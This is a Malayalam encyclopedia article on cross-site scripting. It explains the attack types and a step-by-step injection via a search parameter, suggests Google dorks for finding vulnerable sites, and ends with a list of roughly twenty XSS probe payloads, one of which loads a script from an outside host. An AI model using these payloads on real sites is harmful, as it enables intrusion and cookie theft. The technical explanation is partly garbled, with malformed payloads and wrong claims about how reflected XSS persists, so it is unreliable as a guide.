ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ്
 |
വിക്കിപീഡിയയുടെ ഗുണനിലവാരത്തിലും, മാനദണ്ഡത്തിലും എത്തിച്ചേരാൻ ഈ ലേഖനം വൃത്തിയാക്കി എടുക്കേണ്ടതുണ്ട്. ഈ ലേഖനത്തെക്കുറിച്ച് കൂടുതൽ വിശദീകരണങ്ങൾ നൽകാനാഗ്രഹിക്കുന്നെങ്കിൽ ദയവായി സംവാദം താൾ കാണുക. ലേഖനങ്ങളിൽ ഈ ഫലകം ചേർക്കുന്നവർ, ഈ താൾ വൃത്തിയാക്കാനുള്ള നിർദ്ദേശങ്ങൾ കൂടി ലേഖനത്തിന്റെ സംവാദത്താളിൽ പങ്കുവെക്കാൻ അഭ്യർത്ഥിക്കുന്നു. |
വെബ്ബ് ആപ്ലിക്കേഷനുകളിലെ വെബ് താളുകളിൽ സംഭവിക്കാവുന്ന ഒരു സുരക്ഷാപ്രശ്നമാണ് ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് Cross-site scripting. ഇതു വഴി ഉപയോക്താക്കൾ ഉപയോഗിക്കുന്ന ഒരു വെബ് താളിലേക്ക് ഹാക്കർമാർക്ക് ജാവാസ്ക്രിപ്റ്റ് പോലുള്ള ക്ലൈന്റ് സൈഡ് സ്ക്രിപ്റ്റുകൾ കൂട്ടിച്ചേർക്കുവാൻ സാധിക്കുന്നു.
സൈബർ ലോകത്തിന്റെ തീരാ തലവേദനയാണ് ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ്. വെബ്സൈറ്റുകൾ ഡിഫേസ് ചെയ്യാൻ അഥവാ വെബ് പേജുകളുടെ മുഖച്ചിത്രം മാറ്റാൻ കഴിയുന്ന ഒരു എഴുതാന്നു എക്സ്-എക്സ്-എസ് Xss malicous script ഇത് ആയതു കൊണ്ട് തന്നെ ഒരു വെബ്സൈറ്റ് ഉടമയ്ക്ക് അയാളുടെ കമ്പ്യൂട്ടറിൽ നിന്നും വെബ്സൈറ്റ് അപ്ഡേറ്റ് ചെയ്യുമ്പോൾ കാണാൻ കഴിയില്ല മറ്റൊരാൾ കമ്പ്യൂട്ടറിൽ ആ വെബ്സൈറ്റ് സന്ദർശിക്കുമ്പോൾ അയാൾക്ക് ഹാക്കർമാർ ചെയ്ത വെബ് പേജ് കാണുന്നു. സാധാരണയായി പിഷിംഗ്, കുക്കി സ്റ്റില്ലിംഗ്, എന്നിവയ്ക്ക് വേണ്ടിയാണ് ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് XSS ചെയ്യുന്നത്. ഏറ്റവും വലിയ സെർച്ച് എൻജിൻ ആയ ഗൂഗിൾ പോലും ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ്റ്റെ പിടിയിലാണ്. ഇയിടെ സോഷ്യൽ നെറ്റ്വർക്ക് ആയ ഫേസ്ബുക്കിൽ കണ്ടത്തിയ ഒരു എക്സ്.എക്സ്.എസ് ഹോലെൾ ഇവിടെ നൽകുന്നു. channel facebook com-cross-site-scripting
ഒരു ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് XSS എങ്ങനെ പ്രവർത്തിക്കുന്നു [തിരുത്തുക]
- ഒരു ഹാക്കർ അയാൾക്ക് അവശ്യമായ രീതിയിലുള്ള ഒരു വെബ് പേജ് നിർമിക്കുന്നു(youhacked.htm)
- ആ പേജ് ഒരു വെബ് സൈറ്റിൽ അപ്ലോഡ് ചെയ്യുന്നു.(http://www.anysite.com/youhacked.htm)
- എന്നിട്ട് അത് ഒരു ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് XSS ഉള്ള വെബ് സൈറ്റ് ഓ, എക്സ്-എക്സ്-എസ്നു സാധിക്കുന്ന യു.ആർ.അൽ (victimwebsite.com/search.php?q=) കണ്ടുപിടിക്കുന്നു
- (victimwebsite.com/search.php?q=)എന്നതിന് അപ്പുറത്ത് ജാവാസ്ക്രിപ്റ്റ് ഉപയോഗിച്ചു ഇങ്ങനെ ( <script>window.open("http://www.anysite.com/youhacked.htm.com/" )</script> ) എഴുതി ചേർത്ത് എന്റർ അമർത്തുന്നു.
- തന്മൂലം http://www.anysite.com/youhacked.htm.com എന്ന വെബ് പേജ് victimwebsite.com സെർവറിൽ സേവ് ആകുന്നു
- ഇതൊന്നും അറിയാത്ത കമ്പ്യൂട്ടർ ഉപയോക്താവ് (vitimwebsite.com) എന്ന വെബ്സൈറ്റ് സന്ദർശിക്കുമ്പോൾ ഹാക്കർമാർ ചെയ്തു വച്ച ചതിക്കുഴിക്കുള്ളിൽ വീഴുന്നു.
വിവിധതരം എക്സ്-എക്സ്-എസ് [തിരുത്തുക]
സാധാരണയായി മൂന്ന് തരത്തിലുള്ള എക്സ്-എക്സ്-എസ് ആണ് വെബ്സെർവറുകളിൽ കണപ്പെടുന്നത് അവ താഴെ കൊടുക്കുന്നു.
- ഡോം ബേസ്ഡ് എക്സ്-എക്സ്-എസ് - DOM-Based XSS
- നോൺ പെര്സിസേന്റ്റ് - Non-persistent XSS
- പെര്സിസേന്റ്റ് - Persistent XSS
ഡോം ബേസ്ഡ് എക്സ്-എക്സ്-എസ് - DOM-Based XSS [തിരുത്തുക]
ഇ ഡോം ബേസ്ഡ് എക്സ്-എക്സ്-എസ് പിടിയ്ൽ പെട്ട വെബ്സൈറ്റ്കൾക്ക് വളരെ പെട്ടന്നു തന്നെ തകർക്കാൻ ഹാക്കർമാർക്ക് കഴിയും. ഡോം ബേസ്ഡ് എക്സ്-എക്സ്-എസ് ഉള്ള ഒരു വെബ്സൈറ്റ് അല്ലെങ്കിൽ അതുമൂലം തകർന്ന വെബ് പേജ്കൽ എന്നിവയൊന്നും ഗൂഗിൾ സേർച്ച് എൻജിൻ ടാറ്റ ബേസിൽ നിന്നും മായിച്ച് കളയാൻ എളുപ്പമല്ല. ആയതു കൊണ്ടു തന്നെ സൈബർ ലോകം ഡോം ബേസ്ഡ് എക്സ്-എക്സ്-എസ് - DOM-Based XSS ഇപ്പോഴും പേടിക്കുന്നു
നോൺ പെര്സിസേന്റ്റ് എക്സ്-എക്സ്-എസ് Non-persistent XSS [തിരുത്തുക]
ഇത്തരം എക്സ്-എക്സ്-എസ്സുകൾ ചില സമയങ്ങളിൽ മാത്രമേ ഒരു കമ്പ്യൂട്ടർ ഉപഭോക്താവിനു കാണുകയുള്ളൂ ആയതുകൊണ്ട് ഇ നോൺ പെര്സിസേന്റ്റ് - Non-persistent XSS കൾ കുക്കി സ്റ്റില്ലിംഗ് മാത്രമേ ഹാക്കർമാർ ഉപയോഗികുന്നത്
പെര്സിസേന്റ്റ് എക്സ്-എക്സ്-എസ് Persistent XSS [തിരുത്തുക]
മുകളിൽ പറഞ്ഞ നോൺ പെര്സിസേന്റ്റ് - Non-persistent XSS നോട് ഉപമിക്കാൻ കഴിയും. എന്നാൽ ഇതു ഗസ്റ്റ് ബുക്ക്,ഫോറംസ്, ഷൌട്ട് ബോക്സ്, കമെന്റ്റ് ബോക്സ് എന്നിവയിൽ കണപ്പെടുന്നു,
എങ്ങനെ ഒരു ക്രോസ് സൈറ്റ് സ്ക്രിപ്റ്റിംഗ് ഹോൾ കണ്ടെത്താം [തിരുത്തുക]
സാധാരണയായി സെർച്ച് ബോക്സ്സുകളില്ലും ,ഗസ്റ്റ് ബുക്കുകളിലുമാണ് കൂടുതലായി കണപ്പെടുന്നത്.. പെട്ടെന്നു കണ്ടെത്താൻ വേണ്ടി ഗൂഗിൾ ടോർക്സ്(Google Dorks) ഉപയോഗിക്കുന്നു.
website.com/search.php?q="><script>alert('XssED BY XssER')</script>
website.com/search.php?q="><script>alert("XssED BY XssER")</script>
website.com/search.php?q="><script>alert("XssED BY XssER");</script>
website.com/search.php?q="><script>alert(/XssED BY XssER");</script>
website.com/search.php?q=//"><script>alert(/XssED BY XssER/);</script>
website.com/search.php?q=abc<script>alert(/XssED BY XssER/);</script>
website.com/search.php?q=abc"><script>alert(/XssED BY XssER/);</script>
website.com/search.php?q=abc"></script><script>alert(/XssED BY XssER/);</script>
website.com/search.php?q=abc//abc"></script>alert(/XssED BY XssER/);</script>
website.com/search.php?q=000"><script></script><script>alert(XssED BY XssER);</script>
website.com/search.php?q=000abc</script><script>alert(/XssED BY XssER/);</script>
website.com/search.php?q=--<script>"></script>alert(/XssED BY XssER/);</script>
website.com/search.php?q=pwned<script>document.write('XssED BY XssER');</script>
website.com/search.php?q=pwned</script><script>document.write(XssED BY XssER);</script>
website.com/search.php?q=pwned')alert(XssED BY XssER);//
website.com/search.php?q=pwned";)alert(XssED BY XssER);//
website.com/search.php?q=pwned");alert(/XssED BY XssER/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/XssED BY XssER/);</script>
website.com/search.php?q="><img src='javascript:alert('XssED BY XssER');'>
website.com/search.php?q="><script src='http://malicous js'</script>
ഇവയെല്ലാം എക്സ്-എക്സ്-എസ് സ്ക്രിപ്റ്റിംഗ് നു ഉദാഹരണമാണ്..
